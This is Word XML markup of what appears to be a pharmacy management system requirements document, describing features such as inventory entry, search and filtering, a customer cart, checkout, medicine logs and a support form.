              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79AC7817" wp14:editId="688805CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40089" name="Group 40089"/>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40" name="Shape 495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41" name="Shape 495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42" name="Shape 495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43" name="Shape 495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44" name="Shape 495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89" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49545" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49546" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49547" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49548" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4954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455359DF" wp14:editId="29AB9608">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="40090" name="Group 4009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50" name="Shape 495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1" name="Shape 495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52" name="Shape 495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3" name="Shape 495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54" name="Shape 495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90" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49555" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49556" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49557" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49558" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4955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sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When the pharmacy gets a new stock of medicines from its supplier, the operator can add these medicines into its inventory. The feature will consist of various fields like Medicine name, price, quantity, expiry date, etc. which would make the database of the pharmacy much more comprehensive than any other database. The priority of this feature is medium. When the operator/worker needs to update the inventory of the store into the database, the operator needs to go to the inventory adding page. The page will consist of various fields like Item name, price, expiry date, quantity, etc. The operator needs to add all the information and click on the update button to update the database. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF179C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="16"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09299810" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory Display and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Filtering :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB4FDE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="79" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This feature facilitates the operator to easily navigate through the database to view the information of the medicines in the database. The operator can filter the database as per the customer’s medicine requirements. He can even search for the medicine by entering the name of the medicine. After navigating to the medicine, the operator can view the details of the medicine like name, price, expiry date, available quantity, etc. This improves the transparency of the medicine details to the customer as well. When the operator needs to search for the medicine, he can enter the name of the medicine into the search box. He can even filter the database by ticking some of the checkbox criteria’s which are categorized by default. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF3B802" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="16"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7260D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Cart :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABAE57" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="79" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When the operator clicks on the first add to cart button, a virtual cart is created and the operator can add multiple items in a similar way. To view the items, present in the cart, the operator can click on the cart image and it will display all the items that were added </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">by him. The operator can modify the cart by clicking on the + button to increase the quantity of medicines and the - button to decrease the quantity of medicines. X button can be used to delete any items present in the cart. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C35D7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA6B39" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="16"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB035B0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer Details and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Checkout :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45085B75" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="79" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This feature is used for taking in the details of the customer for log purposes. It will help understand the customer needs better. The operator needs to input all the customer fields in the respective fields and click on submit button. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA96C05" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="16"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA1F7D3" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Medicine </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Logs :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AD24CD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="78" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This feature is used to keep a track of all the medicines that were sold from the Pharmacy. It helps the Pharmacy to plan their next supply date and to decide what medicines are required to be ordered. This option is not visible to the operators. The supervisor can access the medicines log just by clicking on its hyperlink. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7769D3CA" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="17"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EEEE62" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Customer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Support :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C0523" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="82" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this feature, the Pharmacies can reach out to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Technical</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> support just by entering their name, phone number and their issues and the technical department will be able to help them out regarding their issues. The supervisor has to just enter and fill in the details asked by the website and click on the submit button. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379DD9E5" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBCF94A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36A77877" wp14:editId="51C5329D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41637" name="Group 4163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60" name="Shape 495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1" name="Shape 495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62" name="Shape 495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3" name="Shape 495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64" name="Shape 495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637" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49565" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49566" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49567" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49568" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4956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15339285" wp14:editId="7688B7DA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41642" name="Group 4164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70" name="Shape 495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1" name="Shape 495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72" name="Shape 495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3" name="Shape 495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74" name="Shape 495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642" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49575" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49576" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49577" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49578" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4957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Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B45038" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417640FF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A84981" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0318D606" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD756E7" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DDAFF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14375BF4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF6806" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6737C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B195CEC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EB3C2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A12F423" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
